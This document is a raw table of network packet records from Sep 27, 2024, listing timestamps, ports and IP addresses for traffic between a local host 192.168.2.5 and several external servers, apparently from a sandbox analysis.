Sep 27, 2024 04:21:15.572055101 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572072029 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572082043 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572089911 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572098970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572108984 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572114944 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572132111 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572138071 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572144032 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572154999 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572161913 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572174072 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572199106 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572227001 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572262049 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572273016 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572283983 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572298050 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572309017 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572323084 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572360992 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572376966 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572387934 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572397947 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572417021 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572449923 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572596073 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572607040 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572618961 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572628975 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572638988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572648048 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572659969 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572659969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572671890 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572690964 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572715044 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572853088 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572864056 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572874069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572900057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572915077 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572926998 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572926998 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572938919 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572951078 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.572958946 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.572978973 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.573008060 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.573030949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.573077917 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.573098898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.573111057 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.573147058 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.573158979 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.573182106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.573194027 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.573204041 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.573215008 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.573220968 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.573241949 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.573273897 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.575114012 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:15.575839043 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575850010 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575870991 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575881004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575892925 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575897932 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.575934887 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575938940 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.575948000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575972080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575974941 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.575983047 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.575993061 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.576000929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.576015949 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.576025963 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.576056004 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587517023 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587527990 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587538004 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587548971 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587558985 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587577105 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587580919 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587589025 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587601900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587616920 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587625027 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587629080 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587646008 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587666035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587667942 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587677002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587687969 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587702990 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587723970 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587733984 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587734938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587781906 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587800026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587810993 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587821960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587837934 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587866068 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587869883 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587882042 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587893009 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.587909937 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.587938070 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609149933 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609160900 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609177113 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609189987 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609200954 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609229088 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609275103 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609277010 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609288931 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609299898 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609317064 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609323025 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609329939 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609359026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609380960 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609392881 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609395981 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609460115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609460115 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609461069 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609474897 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609483957 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.609505892 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609518051 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.609536886 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.612066984 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.612087011 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.612165928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.612165928 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.616617918 CEST	49714	26212	192.168.2.5	95.179.250.45
Sep 27, 2024 04:21:15.619122028 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.619184971 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.619195938 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.619204044 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.619231939 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.619241953 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.619254112 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.619261026 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.619265079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.619277000 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.619278908 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.619288921 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.619347095 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.619419098 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.621406078 CEST	26212	49714	95.179.250.45	192.168.2.5
Sep 27, 2024 04:21:15.641784906 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.641835928 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.641848087 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.641865015 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.641875982 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.641915083 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.641925097 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.641966105 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.642014027 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.650584936 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650693893 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.650697947 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650708914 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650719881 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650732040 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650753021 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650758982 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.650765896 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650801897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650814056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.650862932 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.650862932 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.650928020 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.651051044 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.651947975 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.651958942 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.651969910 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652007103 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652018070 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652019978 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652020931 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652046919 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652054071 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652065992 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652069092 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652096987 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652108908 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652120113 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652122021 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652162075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652162075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652373075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652386904 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652399063 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652410030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652439117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652439117 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652447939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652461052 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652510881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652510881 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652658939 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652671099 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652682066 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652733088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652733088 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652741909 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652753115 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652767897 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652781963 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652791023 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652841091 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652841091 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652872086 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652884007 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652895927 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652910948 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652918100 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652925014 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652932882 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652947903 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.652973890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652973890 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.652992964 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653397083 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653451920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653464079 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653475046 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653503895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653503895 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653506041 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653518915 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653531075 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653559923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653559923 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653577089 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653739929 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653752089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653763056 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653803110 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653817892 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653840065 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653851986 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653862953 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653873920 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.653898001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653898001 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.653959990 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.655838013 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.655925035 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656039000 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656049967 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656060934 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656075954 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656090975 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656091928 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656104088 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656116962 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656126976 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656130075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656130075 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656140089 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656157017 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656167030 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656167030 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656188011 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656188965 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656192064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656205893 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656215906 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656219006 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656229973 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656241894 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656264067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656264067 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656300068 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656778097 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656790972 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656800985 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656841993 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656867027 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656934977 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656944990 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656955004 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656964064 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656974077 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656984091 CEST	80	49725	185.215.113.117	192.168.2.5
Sep 27, 2024 04:21:15.656994104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.656994104 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.657061100 CEST	49725	80	192.168.2.5	185.215.113.117
Sep 27, 2024 04:21:15.661446095 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661524057 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.661556959 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661566019 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661575079 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661585093 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661595106 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661604881 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661612988 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.661634922 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661639929 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.661648035 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661663055 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.661705017 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661711931 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.661715031 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661731005 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661752939 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.661760092 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661771059 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661772013 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.661782026 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661791086 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.661811113 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.661839962 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662410021 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662419081 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662431002 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662465096 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662468910 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662475109 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662486076 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662491083 CEST	49724	80	192.168.2.5	176.113.115.95
Sep 27, 2024 04:21:15.662497997 CEST	80	49724	176.113.115.95	192.168.2.5
Sep 27, 2024 04:21:15.662508965 CEST	80	49724	176.113.115.95	192.168.2.5
